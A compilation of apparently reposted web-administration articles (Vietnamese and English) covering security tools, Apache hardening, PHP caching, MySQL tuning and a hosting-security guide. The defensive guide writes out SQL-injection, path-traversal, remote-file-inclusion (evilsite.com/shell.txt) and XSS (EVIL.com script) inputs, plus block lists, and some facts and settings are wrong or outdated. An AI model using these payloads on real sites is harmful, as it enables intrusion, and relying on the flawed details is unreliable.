1. John the Ripper

John the Ripper là một công cụ phần mềm bẻ khóa mật khẩu ban đầu được phát triển cho hệ điều hành Unix. Nó là một trong những chương trình testing/breaking mật khẩu phổ biến nhất vì có kết hợp một số bộ cracker mật khẩu trong cùng một gói phần mềm, tự động phát hiện các kiểu mật khẩu và có một bộ cracker có khả năng tùy chỉnh. Công cụ này có thể được chạy cho các định dạng mật khẩu đã được mã hóa chẳng hạn như các kiểu mật khẩu mã hóa vẫn thấy trong một số bản Unix khác (dựa trên DES, MDS hoặc Blowfish), Kerberos AFS và Windows NT/2000/XP/2003 LM hash. Bên cạnh đó còn có các mođul bổ sung mở rộng khả năng gồm có cả các kiểu mật khẩu MD4 và các mật khẩu được lưu trong LDAP, MySQL và các thành phần khác.

2. Nmap

Nmap là một trình quét bảo mật mạng được nhiều người ưa thích. Nó được sử dụng để phát hiện các máy tính và các dịch vụ trên mạng máy tính, sau đó sẽ tạo một “bản đồ” mạng. Cũng giống như các bộ quét cổng đơn giản, Nmap có khả năng phát hiện các dịch vụ thụ động (passive) trên một mạng dù các dịch vụ như vậy không tự khuyếch trương bản thân chúng bằng một giao thức phát hiện dịch vụ. Thêm vào đó, Nmap có thể phát hiện các thông tin chi tiết khác nhau về các máy tính từ xa. Chúng có thể phát hiện ra hệ điều hành, kiểu thiết bị, thời gian và sản phẩm phần mềm chạy dịch vụ, số phiên bản chính xác của sản phẩm đó, sự hiện diện của một số công nghệ tường lửa trên một mạng nội bộ hoặc thậm chí cả hãng sản xuất card mạng từ xa.

Nmap chạy trên Linux, Microsoft Windows, Solaris, và BSD (gồm có Mac OS X), và trên cả AmigaOS. Linux là một nền tảng của nmap phổ biến nhất còn Windows là thứ hai.

3. Nessus

Nessus là một phần mềm quét lỗ hổng khá toàn diện. Mục tiêu của nó là phát hiện các lỗ hổng tiềm ẩn trên các hệ thống được kiểm tra chẳng hạn như:

- Vulnerabilities that allow a remote cracker to control or access sensitive data on a system.

- Các lỗ hổng cho phép cracker từ xa có thể kiểm soát hoặc truy cập các dữ liệu nhạy cảm trên hệ thống.

- Lỗi cấu hình (ví dụ như mở mail relay, mất các bản vá,…)

- Các mật khẩu mặc định, một số mật khẩu chung, các một khẩu blank/absent (trắng hay thiếu) trên một số tài khoản hệ thống. Nessus cũng có thể gọi Hydra (một công cụ bên ngoài) để khởi chạy một tấn công dictionary.

- Từ chối dịch vụ đối với ngăn xếp TCP/IP bằng bằng sử dụng các gói dữ liệu đã bị đọc sai.

Nessus là một trình quét lỗ hổng phổ biến nhất hiện nay trên thế giới, ước lượng có đến 75.000 tổ chức trên toàn thế giới sử dụng. Nó xuất hiện lần đầu tiên trong bảng thống kê các công cụ bảo mật 2000, 2003 và 2006 cúa SecTools.Org.

4. chkrootkit

Chkrootkit (Check Rootkit) là một chương trình của Unix nhằm giúp các quản trị viên hệ thống kiểm tra hệ thống của họ về các rootkit. Nó là một kịch bản sử dụng các công cụ UNIX/Linux giống như các chuỗi và các lệnh grep để tìm kiếm các dấu hiệu trong các chương trình hệ thống lõi và so sánh sự mâu thuẫn của /proc filesystem với đầu ra của lệnh ps (process status) nhằm tìm kiếm những vấn đề khác nhau.

Chương trình này có thể được sử dụng từ một “đĩa giải cứu” hoặc có có thể sử dụng một thư mục khác để chạy tất cả các lệnh của riêng nó.

Tuy vậy vẫn có một số hạn chế cố hữu về độ tin cậy của bất cứ chương trình nào muốn phát hiện sự thỏa hiệp (chẳng hạn như các rootkit và các virus máy tính). Các rootkit mới hơn có thể phát hiện và thỏa hiệp các copy của các chương trình chkrootkit hoặc dùng các thủ đoạn khác để vòng tránh sự phát hiện bởi chương trình này.

5. Wireshark

Wireshark là môt ứng dụng được sử dụng để khắc phục sự cố mạng, phân tích, phần mềm và phát triển giao thức truyền thông. Vào tháng 6 năm 2006, dự án đã được đổi tên thành Ethereal do một số vấn đề về tên thương mại.

Wireshark cung cấp các chức năng giống như tcpdump, tuy nhiên nó lại có giao diện đồ họa người dùng và nhiều thông tin khác cũng như các tùy chọn. Chương trình này cho phép người dùng có thể quan sát tất cả lưu lượng trên mạng (thường là mạng Ethernet nhưng cũng hỗ trợ các tùy chọn khác).

Wireshark sử dụng cross-platform GTK+ widget toolkit và là cross-platform, chạy trên nhiều hệ điều hành khác nhau chẳng hạn như Linux, Mac OS X và Microsoft Windows. Được phát hành dưới dạng GNU General Public License và đây là một phần mềm miễn phí.

6. Netcat

Netcat là một tiện ích mạng dành để đọc và ghi các kết nối mạng TCP hoặc UDP.

Phần mềm này được bình chọn là công cụ bảo mật mạng hữu dụng thứ hai vào năm 2000 do insecure.org bình chọn. Đứng thứ tư vào năm 2003 và giữ nguyên vị trí đó cho đến cuộc bình chọn năm 2006.

Phiên bản ban đầu của netcat là một chương trình UNIX. Tác giả viết chương trình này đã phát hành phiên bản 1.1 và tháng Ba năm 1996.

Netcat có khả năng tương thích POSIX và những bổ sung đang tồn tại, có thể ghi đè với tính năng GNU netcat.

7. Kismet

Kismet là một bộ phát hiện, kiểm tra dữ liệu và hệ thống phát hiện xâm phạm cho các mạng LAN không dây 802.11. Nó làm việc với bất cứ card không dây nào có hỗ trợ chế độ kiểm tra các mưu đồ bất lương, bên cạnh đó còn có thể sử dung để kiểm tra lưu lượng của các chuẩn 802.11a, 802.11b và 802.11g.

Kismet không giống như hầu hết các bộ phát hiện mạng không dây khác ở tính thụ động. Điều này có nghĩa rằng không cần gửi bất kỳ một gói tin có thể ghi nào, nó vẫn có thể phát hiện sự hiện diện của các điểm truy cập không dây, các máy khách không dây và mối liên quan giữa chúng.

Công cụ này cũng có các tính năng cơ bản của một IDS không dây, chẳng hạn như phát hiện các chương trình kiểm tra ở chế độ tích cực NetStumbler cũng như một số các tấn công mạng không dây khác.

8. Hping

Hping là một bộ tạo và phân tích gói cho giao thức TCP/IP. Đây là một trong những công cụ hữu hiệu cho việc thẩm định bảo mật và kiểm tra các tường lửa và các mạng, nó được sử dụng để khai thác các kỹ thuật quét nhàn rỗi (cũng được dự định bởi chính tác giả viết ra nó) và hiện được bổ sung thêm trong Nmap Security Scanner. Phiên bản mới của hping là hping3 có khả năng tạo kịch bản bằng cách sử dụng ngôn ngữ Tcl và thực thi một cơ chế dựa trên chuỗi, mô tả các gói TCP/IP có thể đọc để các lập trình viên có thể viết các kịch bản để thao tác ở các gói TCP/IP mức thấp và phân tích trong thời gian rất ngắn.

Giống như các công cụ khác được sử dụng cho việc bảo mật máy tính, hping cũng rất hữu dụng cho cả các quản trị viên hệ thống và các cracker (hoặc những người mới viết kịch bản).

9. Snort

Snort là một chương trình mã nguồn mở, miễn phí, nó có khả năng phát hiện sự xâm nhập mạng và ngăn chặn sự xâm nhập này bằng viêc thực hiện ghi các gói và phân tích lưu lượng theo thời gian thực trên các mạng IP.

Snort thực hiện phân tích giao thức, searching/matching nội dung và được sử dụng để khóa (chủ động) hoặc phát hiện (thụ động) các tấn công hay những sự thăm dò chẳng hạn như tràn bộ đệm, việc quét trái phép các cổng, tấn công ứng dụng web, thăm dò SMB và nhiều tính năng khác nữa. Phần mềm này được sử dụng nhiều nhất cho mục đích ngăn chặn sự xâm nhập bằng cách khóa chặn các tấn công khi chúng bị phát hiện. Snort có thể được kết hợp với các phần mềm khác như SnortSnarf, sguil, OSSIM và Basic Analysis and Security Engine (BASE) để cung cấp một trình diễn mang tính trực giác đối với dữ liệu xâm phạm.

10. tcpdump

Tcpdump là một công cụ gỡ rối các vấn đề về mạng, công cụ này chạy trong tiện ích dòng lệnh. Nó cho phép người dùng thông dịch và hiển thị các gói TCP/IP và các gói khác đang được truyền tải hoặc được nhận trên một mạng mà máy tính đó kết nối với.

Trong một số hệ điều hành giống như Unix, một người dùng phải có các đặc quyền “superuser” để sử dụng tcpdump vì các cơ chế capture gói dữ liệu trên các hệ thống khác yêu cầu các đặc quyền này. Tuy vậy, tùy chọn –Z có thể được sử dụng để bỏ đi những đặc quyền đối với một người dùng không có đặc quyền cụ thể sau khi việc capture đã được thiết lập. Trong các hệ điều hành giống như Unix, cơ chế capture có thể được cấu hình để cho phép những người dùng không có đặc quyền cũng có thể sử dụng nó; nếu điều đó được thực thi thì các đặc quyền superuser sẽ không cần thiết.

Người dùng có thể tùy chọn sử dụng bộ lọc BPF để hạn chế số lượng gói được quan sát bởi tcpdump; điều này ám chỉ rằng đầu ra sẽ hiệu suất hơn với phân vùng cao lưu lượng.

nguồn: quantrimang.com

sưu tầm từ http://www.webhostingtalk.com/showthread.php?t=750506

Khi cài đặt Apache cho máy chủ web của công ty. Hệ thống sẽ chạy rất êm ái và người quản trị nghĩ rằng mọi vấn đề về bảo mật đã hoàn thành. Nhưng hai tuần sau, mọi thứ bắt đầu thay đổi theo chiều hướng xấu.

Tại sao? Đó là do Linux và Apache. Điều gì tạo nên sai lầm? Đó là do người quản trị đã không cẩn thận. Dưới đây là một số cách để có thể nâng cao tính bảo mật của Apache.

1. Nâng cấp: Apache chạy trên Linux không có nghĩa là không phải nâng cấp. Những lỗ hổng và những nguy cơ mới được phát hiện thường xuyên. Hãy luôn theo dõi tình hình nâng cấp với những bản vá lỗi mới nhất. Nếu người quản trị cài đặt với file đóng gói, việc nâng cấp sẽ rất dễ dàng. Nếu cài đặt với mã nguồn, hãy kiểm tra chắc chắn rằng quá trình cập nhật sẽ không làm hỏng các modul hay những gì trang web đang phụ thuộc. Và nếu nâng cấp Apache hãy chắc chắn rằng PHP cũng nâng cấp theo để trang web có thể hoạt động được tốt trong môi trường mới.

2. Quản lý các thành viên theo nhóm: Apache đã thiết lập rất nhiều nhóm và/hoặc thành viên. Tài khoản nguy hiểm nhất chính là tài khoản quản trị (Root). Tài khoản này có thể làm mọi việc trên máy chủ Apache. Hoặc có thể là Apache và MySQL cùng chạy trên một nhóm hoặc tài khoản. Nếu ở một trong hai chương trình có lỗ hổng, hacker có thể tấn công vào cả chương trình kia. Một kịch bản tốt nhất chính là để cho Apache chỉ chạy với tài khoản và nhóm của Apache. Để tạo ra sự thay đổi này, hãy mở file httpd.conf và tìm đến dòng:

User
Group

Thay bằng

User apache
Group apache

Nếu nhận thấy bất kỳ thông báo nào về nhóm hay thành viên không tồn tại, hãy khởi tạo chúng.

3. Tắt những dịch vụ không cần thiết: Có một vài dịch vụ/tính năng mà người quản trị sẽ muốn tắt/ không cho phép hoạt động. Tất cả các dịch vụ có thể bị ngắt trong file httpd.conf. Một vài lựa chọn để có thể ngắt mà không ảnh hưởng gì:

• Directory browsing: Sử dụng Options và thiết lập “-Indexing”.
• Server side Includes: Đây là một dịch vụ khác có thể ngắt, sử dụng Options và thiết lập “-Includes”.
• CGI execution: Trừ khi trang web cần một cồng giao tiếp dùng chung, không thì hãy tắt nó đi. Tính năng này có thể ngắt thông qua Options với thiết lập “-ExecCGI”.
• Symbolic links: Hãy thiết lập ở bên trong thư mục với “-FollowSymLinks”.
• None: Người quản trị có thể bỏ đi tất cả các chọn lựa bằng cách sử dụng “None” cùng với Option.

4. Tắt những module không cần thiết: Apache có hàng “tấn” các module. Để biết được có bao nhiêu module đang hoạt động, hãy sử dụng lệnh (với tài khoản quản trị) grep -n LoadModule httpd.conf. Lệnh này sẽ cho người quản trị thấy tất cả các module của Apache đang hoạt động trên mỗi dòng hiển thị. Hãy ngắt những modul không cần thiết bằng cách đơn giản là thêm ký tự # trước mỗi dòng của module.

5. Hạn chế truy cập: Khi công ty có mạng nội bộ thì có nghĩa là những thông tin của doanh nghiệp đang gặp nguy hiểm. Người quản trị sẽ muốn từ chối tất cả những người không thuộc công ty truy cập vào mạng và lấy thông tin. Để làm được việc này, người quản trị có thể cấu hình file httpd.conf nhằm hạn chế truy cập của những thư mục nhạy cảm trong mạng bộ theo những dòng lệnh sau.

Order Deny, Allow
Deny from all
Allow from 192.168.1.0/16

192.168.1.0/16 là địa IP của các máy trong mạng nội bộ công ty. Với tất cả những thay đổi của file httpd.conf hãy khởi động lại Apache để những thay đổi có hiệu lực.

6. Hạn chế kích thước truy vấn: Kiểu tấn công từ chối dịch vụ sẽ luôn có tác dụng nếu như trang web chấp nhận những truy vấn có kích thước lớn trong Apache. Apache có hướng dẫn về LimitRequestBody được đặt tại thẻ Directory. Hãy thiết lập giới hạn của câu lệnh truy vấn phù hợp nhất với trang web của mình. Ở chế độ mặc định, LimitRequestBody được thiết lập là không giới hạn.

7. Sử dụng mod_security: Đây là một điều rất quan trọng. Apache có một modul là mod_security với rất nhiều tính năng như: lọc đơn giản, lọc những truy vấn thường dùng, kiểm soát URL hợp lệ, và dấu địa chỉ IP thật của máy chủ. Việc cài đặt mod_security là tương đối phức tạp. Nhưng người quản trị có thể bắt đầu bằng cách thêm vào Apache hai modul nhỏ là “unique_id” và “security2″. Để thêm hai mục trên, sử dụng lệnh service apache2 configtest. Nếu máy trả lời là Syntax OK thì bạn đã làm việc này rất tốt.

8. Không cho phép duyệt những dữ liệu ngoài thư mục gốc: Cho phép duyệt những dữ liệu ngoài thư mục gốc là một việc mang lại nhiều rắc rồi. Trừ khi người quản trị có những nhu cầu đặc biệt cần đến sự cho phép làm việc này, ngoài ra thì hãy ngắt tính năng này đi. Đầu tiên, cần phải chính sửa file tài liệu gốc Directory như sau:

<Directory />
Order Deny, Allow
Deny from all
Options None
AllowOverride None
</Directory>

Bây giờ, nếu muốn thêm lựa chọn nào cho bất kỳ thư mục trong thư mục gốc , người quản trị phải thêm câu lệnh vào từng thư mục một.

9. Ẩn phiên bản Apache: Tấn công là cách phòng thủ tốt nhất. Và cách tấn công tốt nhất là có thể che dâu tất cả những thông tin có thể che dấu được. Một thông tin quan trọng cần che dấu chính là phiên bản của Apache. Khi ẩn nó đi, chúng ta có thể hạn chế được phần nào những người có kiến thức bảo mật về phiên bản đó xâm nhập một cách nhanh chóng vào máy chủ Web. Để ẩn phiên bản của Apache, hãy thêm vào file gốc của thư mục những dòng lệnh sau:

ServerSignature Off
ServerTokens Prod

10. Ngắt file httpd.conf: Một cách tốt nhất để bảo mật chính là ẩn file httpd.conf khỏi những con mắt tò mò. Nếu mọi người không thể nhìn thấy file httpd.conf, thì họ không thể thay đổi cấu hình bên trong đó. Vô hiệu hóa httpd.conf bằng cách đưa file đó về chế độ không thể thay đổi theo câu lệnh:

chattr +i /path/to/httpd.conf

/path/to/httpd.conf là đường dẫn tới file cấu hình của Apache. Bây giờ, việc thay đổi httpd.conf là một việc vô cùng khó khăn với tất cả mọi người.

ITcenter – Techrepublic

You’ll need to use two files to set up a caching system for your site. The first, “begin_caching.php” in this case, will run before any other PHP on your site. The second, “end_caching.php” in this case, runs after normal scripts have run. The two scripts effectively wrap around your current site.

You can achieve this wrapping effect one of two ways. The first way is to simply use the include() function and add them manually to every script you run. Unfortunately, this method can take some time, but is arguably more portable than the alternative.

The alternative relies on adding the following two lines of code (modified to reflect the correct path to the two PHP files needed) to your htaccess file. This is my preferred method, just because it requires no modification to existing scripts, and can very easily and quickly be turned off (just by commenting out the relevant lines in the htaccess file).

1. php_value auto_prepend_file /full/path/to/begin_caching.php
2. php_value auto_append_file /full/path/to/end_caching.php

Next, we move on to the scripts that do the work. There are several stages to caching a document:

1. Receive request for page
2. Check for the existence of a cached version of that page
3. Check the cached copy is still valid
   • If it is, send the cached copy
   • If not, create a new cached copy and send it

To begin with, the script below contains a few basic settings. Here, you can set the directory you want to save cached files to (I would recommend keeping that directory outside your web root directory or at least protecting it from view through a normal browser). This script will need to be able to create files in this directory, and you need to allow this by setting the permissions of the directory. The permissions depend upon your server set up, so you may want to start by setting them to 777 while testing the script, and then reduce them to the lowest levels possible once the script is working.

You can also set the time, in seconds, a cached file should be considered valid for after creation, and set the file extension for saved files. It would be wise to not name them “.php”, just for safety’s sake.

1. <?php
3. // Settings
4. $cachedir = '../cache/'; // Directory to cache files in (keep outside web root)
5. $cachetime = 600; // Seconds to cache files for
6. $cacheext = 'cache'; // Extension to give cached files (usually cache, htm, txt)
8. // Ignore List
9. $ignore_list = array(
10. 'addedbytes.com/rss.php',
11. 'addedbytes.com/search/'
12. );
14. // Script
15. $page = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; // Requested page
16. $cachefile = $cachedir . md5($page) . '.' . $cacheext; // Cache file to either load or create
18. $ignore_page = false;
19. for ($i = 0; $i < count($ignore_list); $i++) {
20. $ignore_page = (strpos($page, $ignore_list[$i]) !== false) ? true : $ignore_page;
21. }
23. $cachefile_created = ((@file_exists($cachefile)) and ($ignore_page === false)) ? @filemtime($cachefile) : 0;
24. @clearstatcache();
26. // Show file from cache if still valid
27. if (time() - $cachetime < $cachefile_created) {
29. //ob_start('ob_gzhandler');
30. @readfile($cachefile);
31. //ob_end_flush();
32. exit();
34. }
36. // If we're still here, we need to generate a cache file
38. ob_start();
40. ?>

The file starts by generating an MD5 hash of the page that has been requested. It will use the complete requested URL, and the MD5 hash will be a 32 digit number, unique for each file. It then checks for the existence of this file.

If the file exists, it checks to see when it was last updated. If the file is older than the allowed time, it acts as though no cache existed (carrying on and generating a new file). If the file is still valid, it simply displays it.

There is also, in the settings, a list of pages to ignore when caching. This can be search results, comments pages, a news page or news feed – anything that should always be up to date. Simply add anything you do not want cached into here, and it will not be cached. You can add directories, or parts of URLs – the above simply searches for a text string. In the example above, I have left out the “http://www” portion of the URL, as this can be missed out by some visitors.

Finally, the two lines in italics above are both commented out. You can, if you like, uncomment these, and that will use outbut buffering to gzip your content before sending it to users, making your site even faster for them. Please note, though, that output buffering with gz encoding is not available in versions of PHP previous to 4.0.5.

Which brings us to the second file, “end_caching.php”. At the end of the first file, if no cache exists, we start output buffering. This means that rather than send the page to the user, we are saving it for use later. In the second script below, we take the contents of the output buffer, and write it to a file.

1. <?php
3. // Now the script has run, generate a new cache file
4. $fp = @fopen($cachefile, 'w');
6. // save the contents of output buffer to the file
7. @fwrite($fp, ob_get_contents());
8. @fclose($fp);
10. ob_end_flush();
12. ?>

Important: If you do not have “register_globals” set to off in php.ini, make sure you add the following to the beginning of “end_caching.php” (straight after the “<?php” line) to aid security. This will ensure that an attacker cannot visit “end_caching.php” directly and overwrite an important file on your site (or read its contents).

1. $cachedir = '../cache/'; // Directory to cache files in (keep outside web root)
2. $cacheext = 'cache'; // Extension to give cached files (usually cache, htm, txt)
3. $page = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; // Requested page
4. $cachefile = $cachedir . md5($page) . '.' . $cacheext; // Cache file to either load or create

And there we have it. If a cached document exists, it is shown to the user, and if not, one is created.

Finally, you need to make sure the cache remains reasonably clean. Over time, out of date or redundant files could build up, and these should be removed regularly. For this reason, I usually set up an automated script to delete all cache files once a week (or less often, depending on the traffic of the site), but this will depend greatly upon the server software you are using.

The script below is one example of a script to delete all cache files. You will need to set the cache directory at the beginning before running the script. You can either use this manually, visiting the page through your browser whenever you want to empty the cache, or run it automatically. An example of a CRON job used to run this script automatically is below the script (the ” >/dev/null 2>&1″ bit at the end of the crontab prevents the server emailing me every time the script runs). Please note that this last script will be cached too, unless you specify otherwise!

1. <?php
3. // Settings
4. $cachedir = '../cache/'; // Directory to cache files in (keep outside web root)
6. if ($handle = @opendir($cachedir)) {
7. while (false !== ($file = @readdir($handle))) {
8. if ($file != '.' and $file != '..') {
9. echo $file . ' deleted.<br>';
10. @unlink($cachedir . '/' . $file);
11. }
12. }
13. @closedir($handle);
14. }
16. ?>

1. curl http://www.your_domain.com/empty_caching.php >/dev/null 2>&1

Khi thiết kế các hệ thống lớn với nhiều người truy cập, một trong những điều người ta nghĩ đến ngay lập tức là thiết kế CSDL sao cho ta có thể truy vấn nhanh nhất có thể.

Loạt bài dưới đây sẽ trình bày các kỹ thuật tối ưu hoá hệ thống với CSDL MySQL.

Quy tắc 1: Giảm thiểu sự kết nối tới MySQL Server.
Khi kết nối tới CSDL MySQL, chúng ta có 2 hàm kết nối là mysql_connect() và mysql_pconnect(). Về cơ bản thì hai hàm này có các tham số y hệt nhau, nhưng nội hàm của chúng có những khác biệt đáng kể.

Theo lý thuyết, mỗi lần gọi hàm mysql_connect(), hệ thống sẽ khởi tạo một kết nối mới tới CSDL, còn khi sử dụng hàm mysql_pconnect(), hệ thống sẽ tận dụng kết nối đã được thiết lập trước đó.

Nếu trang Web của chúng ta được triệu gọi nhiều lần trong một khoảng thời gian ngắn, hàm mysql_connect() sẽ tiêu tốn một lượng đáng kể tài nguyên của hệ thống để thiết lập kết nối. Vì vậy, hãy cố gắng sử dụng hàm kết nối mysql_pconnect().

Quy tắc 2: Thiết lập các trường index và cố gắng truy vấn dữ liệu thông qua các điều kiện xác lập trên chỉ số.

Nếu các bạn học qua cấu trúc dữ liệu và giải thuật, hẳn chúng ta cũng phải nhớ đến các giải thuật tìm kiếm nhanh. Chúng ta đã đúc kết được rằng giải thuật tìm kiếm là nhanh nhất với cách tìm dựa trên bảng băm hoặc trên mảng đã sắp xếp (với thuật toán tìm kiếm nhị phân nổi tiếng). Các trường được thiết lập ở dạng index sẽ được sắp xếp trên một file riêng, khi chúng ta truy vấn dữ liệu thông qua các trường index, các giải thuật tìm kiếm sẽ phát huy tính hiệu quả tối đa của nó, đặc biệt là các trường index dạng số.

Vì vậy, hãy cố gắng thiết kế các truy vấn cũng như CSDL sao cho tối ưu nhất dựa trên nguyên tắc chỉ số này.

Quy tắc 3: Chấp nhận dư thừa dữ liệu

Một thiết kế dữ liệu theo dạng chuẩn 4 có thể rất đẹp mắt, nhưng khi truy vấn dữ liệu, chúng ta sẽ phải “xới tung” nhiều bảng quan hệ có khi chỉ để lấy ra một record. Ngày xưa, khi giá thành ổ cứng cao ngất ngểu, dung lượng ổ cứng bé tẹo nên các cụ phải thiết kế dữ liệu ở dạng “tiêu chuẩn cao” nhằm giảm dung lượng lưu trữ, nhưng ngày nay, dung lượng lưu trữ không còn là vấn đề đáng lo lắng, vì vậy trong một số trường hợp, hãy chịu khó hi sinh tính đẹp đẽ của chuẩn 4 để tăng tốc độ truy vấn. Nên nhớ rằng truy vấn trên một bảng sẽ nhanh hơn rất nhiều lần khi truy vấn trên nhiều bảng quan hệ.

Quy tắc 4: Chỉ lấy đúng và đủ dữ liệu cần thiết

Nhiều người thường thích truy vấn dạng “Select *…”. Dấu * ở đây sẽ bắt hệ thống làm việc mệt nhọc hơn vì phải xử lý nhiều dữ liệu hơn. Dữ liệu trả về cũng tiêu tốn nhiều bộ nhớ hơn. Vì vậy, thay vì select *, hãy chỉ select những trường cần thiết.

Một vấn đề nữa là khi sử dụng hàm mysql_fetch_array, nhiều người thường bỏ qua các tham số tuỳ chọn. Nếu có thể, hãy sử dụng tham số MYSQL_ASSOC, khi đó hệ thống sẽ trả về một mảng với chỉ số là tên trường, như vậy các bạn sẽ dễ hình dung và đỡ tốn bộ nhớ vì phải phát sinh thêm một mảng với chỉ số dạng số.

Quy tắc 5: Giải phóng bộ nhớ ngay sau khi sử dụng xong

Theo mặc định thì PHP sẽ giải phóng bộ nhớ sau khi chạy xong toàn bộ chương trình, nhưng với một cỗ máy chủ già nua cũ kỹ với hàng trăm lượt truy cập một lúc thì 1 KB bộ nhớ cũng là một tài nguyên cực kỳ quý giá. Vậy tại sao chúng ta không giải phóng bộ nhớ cho những thứ không dùng đến?
Sau khi thực hiện các truy vấn và thực hiện xong các phép tính toán với các bản ghi lấy được, hãy chịu khó nhét cái function mysql_free_result() vào ngay nhé.
(cmxq phpvn.org)

Tổng hợp tại : http://vnsforum.com

Is completely secure some things to do if you are using a common CMS Google it with the word exploit make sure your version is not on there.

Next try any Get Vars in your scripts and put a ‘ at the end of them what I mean is you have = you add ‘ so it’s yourwebsite.com/page?=’ or any other similar thing not only page= you may also try char(39) rather then only ‘ most PHP scripts will automatically add add slashes as a function in the MySQL read so when it goes to read it comments out the ‘ but most PHP that only uses addslashes protection will still be vuln to SQL injection simply using char(39) which the php script will read as a single quote.
If you get an error you might want to check the script.

The errors you may receive are mysql_* this is a sql injection get right on to fixing this because some one would have the ability of dumping your whole database, clients, admins, etc.

If the errors are main()or include_failed you may have just found an LFI (Local File Inclusion) OR RFI (Remote File Inclusion)…
If it is in a path like failed to include /test/file.ext ever then this is an LFI but is very useful to a hacker they have the ability to use
The following to browse into other places ../../../../ if they wanted to they’d view your passwd file via ../../../../../../etc/passwd

Well right now you’d say big Woop they got some users maybe not but still have the ability to go to any forum on
that server and upload an avatar with PHP-EXIF data in it then include it
Using this LFI once they have done this it will execute the code written in this LFI meaning they have access to Run PHP-Code on your server now not good at all…

Recommendations fix the script have mod security block all ../../../../../ to a certain point attempts.

Ok next were going to discuss the abilities of an RFI and how to block it…
So the things you can do with an RFI well lets see remotely include an PHP file that will execute its php file like so
www.yoursite.com/file.php?file=evilsite.com/shell.txt? this php file on your server would then remotely include the other file and execute the PHP code also allowing the user access to your server.

Prevention add http:// to your mod security this way when they try remotely including a file in the URL
http://www.evilsite.com mod_security will block it.

Ok our next subject is XSS this is a tricky one on account of there are many ways around mod security blocking this…

What can XSS do XSS means cross site scripting a hacker can execute JavaScript code on your website using this some XSS is bad which would be called permanent XSS it allows users to embed their JavaScript inside something where you wouldn’t really see it… but when you clicked they could potentially grab your cookie or any current stored browser information.
With this they could use your cookie as their own to login as you… maybe even get password information from this
cookie…

Now the other type of XSS is something you have to train your clients to look out for if some one ever asks for help and sends you a link that is accessing a remote website in the URL such as…
www.mysite.com/info.php?xss=<script>src=http://EVIL.com/xss.js</script>
Never click it what so ever… ban the person who has sent this.

Ok now for the mod_security bans… add <script> add <body= add </script> add “>
And this should fix your XSS problems that can actually cause damage…

As for SQL injection the way to block this is to… add ‘ or /* to the mod security be sure to add in char(39) as it’s ‘ in php and php will in fact read it from a URL and interpret it as ‘ and still launch the sql injection.

One other thing you can do that is not exactly completely necessary but will help if any one does manage to get access to your website.Is you can encrypt all your db.php/conf.php/ files so that hackers cant read the information to gain access to your mysql database or gain any other passwords/usernames you might commonly use more then once.

Zend should fix this problem.

Never leave any open upload scripts what so ever any open upload scripts left on your website will allow the hacker/attacker the ability to upload a file sure you can restrict them to only uploading JPG files or GIF,RAR etc.
But the only problem with that is unless you customize your upload script to check for EXIF data and clear it out of an image when uploading it then the hacker still has something to use against you.

Part II. Your Employees

RULE-1 -PASSWORDS
Do not use password even more then once on your servers if you do the first time some one gets your password to any
Thing they have the ability to get into every thing on your server from there they get other peoples passwords and get more and more access over time they can take the whole hosting company…

RULE-2 -PHONE CHATS
Always request a person’s information verify every bit of it is correct also try to remember their voice because hackers will call you and try to get into people servers they can have correct information just by whoising the persons domain that their trying to get.

RULE-3 -Email CHATS
This one is a bit easier there is no emotion to what the person is trying to do…
If they slip up on one peace of information be sure to email them back and ask them to correct it before even
Sending any thing back or touching any thing.

RULE-4 -Talking to each other
While talking to each other in public services.. or services that my be able to be taped such as an IRC…
Be sure not to mention any root passwords, client names, etc…

Part III. Securing Your Server

Ok well first were going to do the obvious and CHMOD /home to 755

This is simple just go ahead and type chmod 755 /home
Or
CD /
chmod 755 home

Next were going to make sure no user has any bash access what so ever.

This may already be setup by the current hosting control panel you are using…
If not were going to nano /etc/passwd and make sure all Linux users that you don’t want having bash are set to
/sbin/nologin

I realize some hosting companies also do dedicated server companies so it wouldn’t work out if your client didn’t have
bash to the server.
So this is mainly based for the shared hosting servers.

Part IV. PHP Configuration.
Now were going to do some things to PHP.ini
usr/local/lib/php.ini
^ On Most Systems
safe_mode = On
safe_mode_gid = Off
open_basedir = directory [:...]
safe_mode_exec_dir = directory [:...]
expose_php = Off
register_globals = Off
display_errors =Off
log_errors = On
error_log = filename
magic_quotes=On
disable_functions = show_source, system, shell_exec, passthru, exec,
phpinfo, popen, proc_open, base64_decode, base64_encodem, proc_terminate

Some explanations of the functions your disabling.

show_source(), Disables functions most shells use to view the source of other files one commonly
c99, ModfiedC99 (c100), ModfiedC99(x2300)
phpinfo(), Sometimes will bring up XSS, also numeral overflows have been found while using PHPINFO() that and you don’t
want people getting your version of PHP and etc. to attempt to exploit it if you may just be out of date or to up to
date.
system, Allows Bash Commands Via PHP

shell_exec, Allows Bash Commands via PHP

exec, Allows Bash Commands Via PHP

popen, Almost like Bash not quite but close using PHP

proc_open, Almost like bash not quite but close using PHP

base64_decode, decodes base64 encryptions… reason for disabling also allows users with server access to bypass mod security

base64_encode, encodes base64 encryptions… reason for disabling also allows users with server access to bypass mod security

proc_terminate, Terminates Processes running on the server.

Some reasons for having magic quotes on, it disables most nullbyte attempts (%00)
And will stop a small majority of SQL injections.

Part V. MySQL and Apache Configurations
Disable all out bound MYSQL connections…

Besides from Trusted Servers

This may actually be set in the host’s field of the users in the actual MYSQL table, for each user account it lets you
Give them an IP or type any I’d recommend giving them an IP…
Although when you give them and IP don’t worry it’s not that you can only have one IP able to access that user you
do in fact have the ability to recreate the user
over and over and fill in the IP field differently each time.

Next you need to configure your apache to where it runs 1 process for each linux user and all scripts ran by that user run under their unix/linux permissions,GID & UID

A reference Document on how to do this can be found here.

http://httpd.apache.org/docs/1.3/suexec.html

Comments:
What this will do with apache is pretty much make sure that the users can’t access other users directories on the
Server this is a common vulnerability you get access to one site on the server and you get access to all websites on the same
server… this protects against it. All though apache is running under each user using SuEXEC would solve that problem.

Part VI. SSH Keys.

It’s not required but it is a recommendation to setup SSH keys this way people do not have the ability to brute force your SSH server.

A tutorial on how to do this can be found here:

http://www.sun.com/bigadmin/content/submitted/ssh_setting.html

If you do not wish to setup SSH Keys you may also use Linux host.allow, host.deny files to sort which ranges have the ability to access your server and which do not have the ability to access your server.

There are some references for this located here

http://linux.about.com/od/commands/l/blcmdl5_hostsal.htm

And here

http://www.userlocal.com/security/securinginetdetc.php


Part VII. BackDoor-Trojan-Rootkit Proctection & FireWall Setup


Down To The Back Door Protection

